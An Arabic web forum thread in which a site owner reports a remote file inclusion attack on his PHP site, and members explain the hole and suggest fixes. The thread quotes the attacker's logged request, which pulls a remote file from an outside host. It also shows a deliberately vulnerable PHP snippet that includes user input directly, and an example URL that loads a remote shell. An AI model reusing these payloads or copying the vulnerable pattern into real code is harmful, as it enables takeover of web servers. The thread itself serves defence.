النتائج 1 إلى 7 من 7

الموضوع: هنالك هاكرز يهاجمون موقعي ولا اعرف التخلص منهم

  1. #1
    عضو سوبر نشيط
    تاريخ التسجيل
    May 2001
    المشاركات
    867

    هنالك هاكرز يهاجمون موقعي ولا اعرف التخلص منهم



    لقد لاحظت بانهم يستخدمون الاكواد :

    SERV REQUEST_URI=/index.php//classified_right.php?language_dir=http://usuarios.lycos.es/workink/id.txt????

    http://index.php//classified_right.p...ink/id.txt????

    ما العمل؟





    __________________


    موقع دبوريه - عرب 48: http://www.dabburiya.net/index.php

    منتدى دبوريه - عرب 48: http://www.dabburiya.net/forums/index.php



  2. #2
    عضو فعال جدا
    تاريخ التسجيل
    Mar 2008
    المشاركات
    2,485


    اخوي..ثغرة.انكلود...@!!!خطيرة.الثغره.باماكانه.التحكم.بالس يرفر.كامل.حسب.خبرته
    عطل.الدوال..أو..
    Include
    Include_once
    Require
    Require_once

    مثال..للخطا.بالسكربت
    <?php

    $vuln = $_GET['rfi'];

    include ($vuln);

    ?>
    http://localhost/indexx.php?rfi=www.xx.com/shell.txt?
    سكربت..النيوك.مركب.عطل.الدوال.الخطرة.بالسيرفر.
    وانشاءالله.تنحل

    مجرد..توضيح.فقط







  3. #3
    عضو سوبر نشيط
    تاريخ التسجيل
    May 2001
    المشاركات
    867

    اخي فتى الخفجي



    كيف يمكنني تعطيل الدوال التي ذكرتها من ال cpanel ??
    لانه لا يمكنني الوصول للملف php.ini





    __________________


    موقع دبوريه - عرب 48: http://www.dabburiya.net/index.php

    منتدى دبوريه - عرب 48: http://www.dabburiya.net/forums/index.php


  4. #4
    عضو فعال
    تاريخ التسجيل
    Aug 2007
    المشاركات
    1,487


    علي الاقل احذف اي http:// من المتغيرات





    __________________
    عاشت مصر حرة مستقلة

  5. #5
    عضو فعال جدا
    تاريخ التسجيل
    Mar 2008
    المشاركات
    2,485


    كيف يمكنني تعطيل الدوال التي ذكرتها من ال cpanel ??
    لانه لا يمكنني الوصول للملف php.ini
    اذا.انت.على.استضافه.ماتقدررر
    اذا.صاحب.السيرفر.تستطيع






  6. #6


    اتصل بصاحب السرفر واعمله هذا





    __________________
    إِنْ لَمْ تُحْسِنْ ظنَّكَ بِهِ لِأَجْلِ وَصْفِهْ فَحَسِّنْ
    ظَنَّكَ بِهِ لِأَجْلِ مُعَامَلَتِهِ مَعَكْ فَهَلْ عَوَّدَكَ إِلَّا حَسَنًا؟
    وَهَلْ أَسْدَى إِلَيْكَ إِلَّا مِنَنًا؟

  7. #7
    عضو نشيط
    تاريخ التسجيل
    Oct 2008
    المشاركات
    283


    ليس شرطاً أن تعدل في الـ php.ini لسد هذه الثغرة لمنع تضمين الملفات من خارج السرفر
    - افحص قيمة المتغير وتأكد من خلوه لأي كود ضار أو رابط خارجي

    حل سريع في الكود المكتوب بالأعلى
    - انظر في اللغة الإفتراضية التي تعتمد عليها واستخرج المسار الخاص بها
    - خذ المسار وضعه داخل دالة الـ include الخاصة بتضمين ملفات اللغة.
    - بهذا تكون قضيت على تعدد اللغات في موقعك واستخدمت واحدة فقط ..
    وهذا حل مؤقت إن لم تأخذ بأحد الحلول السابقة.

    لا تنسى أيضاً حظر IP المخترق .





    __________________
    اللهم وفقني لما تحبه وترضاه...





ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

أضف موقعك هنا| اخبار السيارات | حراج | شقق للايجار في الكويت | بيوت للبيع في الكويت | دليل الكويت العقاري | مقروء | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض